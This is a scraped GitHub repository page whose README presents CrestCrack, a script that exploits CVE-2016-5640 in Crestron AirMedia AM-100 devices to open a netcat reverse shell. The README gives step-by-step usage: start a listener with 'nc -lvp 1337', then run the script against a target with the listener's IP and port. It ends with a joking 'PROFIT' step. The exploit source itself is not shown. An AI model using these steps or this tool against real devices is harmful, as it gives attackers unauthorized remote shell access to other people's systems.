Skip to content

andrewhenke/python3-Crest-Crack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Supported Python versions

CrestCrack

CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.

Setup:

  1. Clone a copy of CrestCrack git clone https://github.com/vpnguy/CrestCrack 2. Launch a netcat listener nc -lvp 1337 3. Execute CrestCrack against your target with your listener info ./crestcrack.py https://targethost 255.255.255.255 1337 4. ?????? 5. PROFIT ###Usage: ./crescrack.py [target host] [listener IP] [listener port] ###Example: ./crescrack.py https://targethost 123.123.123.123 3311

Additional Vulnerability Information:

Cylance Vulnerability Disclosure NIST CVE-2016-5640

To be added:

  • Error handling/bounds checking - Enhanced argument support - --help output

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages